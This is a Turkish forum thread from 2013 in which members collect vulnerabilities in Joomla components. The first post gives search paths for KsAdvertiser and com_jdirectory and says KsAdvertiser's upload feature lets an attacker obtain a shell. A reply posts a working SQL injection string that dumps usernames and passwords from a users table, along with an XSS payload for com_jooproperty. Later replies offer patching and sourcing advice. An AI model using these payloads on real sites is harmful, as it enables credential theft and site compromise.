Bildiğiniz,duyduğunuz, gördüğünüz bileşen açıklarını bu başlık altında toplarsak gayet iyi olacağını düşünüyorum.
En son keşifim olan KsAdvertiser ilan bileşenin açığıdır.
Nasıl yakaladığıma gelirsek;
yükleme esnasınfa shell alabilecek açık kodları kapatmamışlar.
Aranan link;
index.php?option=com_ksadvertiser
2. açığı olan eklenti linki;
com_jdirectory/task,show_content/
Not: Yedek alın,güncel eklentileri kullanın.
Kolay gelsin
Joomla! Bileşen Açıkları
17
●14.938
- 02-01-2013, 20:13:22Üyeliği durduruldu
- 02-01-2013, 20:43:35Üyeliği durdurulduAttack Pattern Sql:CNMRCN adlı üyeden alıntı: mesajı görüntüle
-{Valid id}%20and%201=0%20union%20select%201,(select group_concat(usernamenedir,0x3D,passwordnediryaa)% 20from%20dy978_users)+--+D4NB4R
/////////
Attack Pattern Xss:
?layout=modal&option=com_jooproperty&product_id=" onmouseover%3dprompt() bad%3d"&view=booking
sanırım bunlar =) - 03-01-2013, 00:29:12Açıklar güncellenmeyen ve fazla tutulmayan eklentilerde var genellikle. Eklenti kulanırken popüler eklentiler Joomla.org sitesinden indirilmeye özen gösterilse çok sorun yaşanmayacak.
- 03-01-2013, 01:35:38İlave olarak, joomla! 2.5 ile gelen, eklenti güncelliğinin her admin logon da sorgulanması güzel bir özellik..ismailkuzucu adlı üyeden alıntı: mesajı görüntüle
- 03-01-2013, 10:53:00Üyeliği durdurulduSon kullanıcılar için Hotlife rapid joomla.org un önermediği her hangi bir siteden eklenti v.s indirmemeleri ayrıca önemli.ismailkuzucu adlı üyeden alıntı: mesajı görüntüle
kesinlikle.burakveelif adlı üyeden alıntı: mesajı görüntüle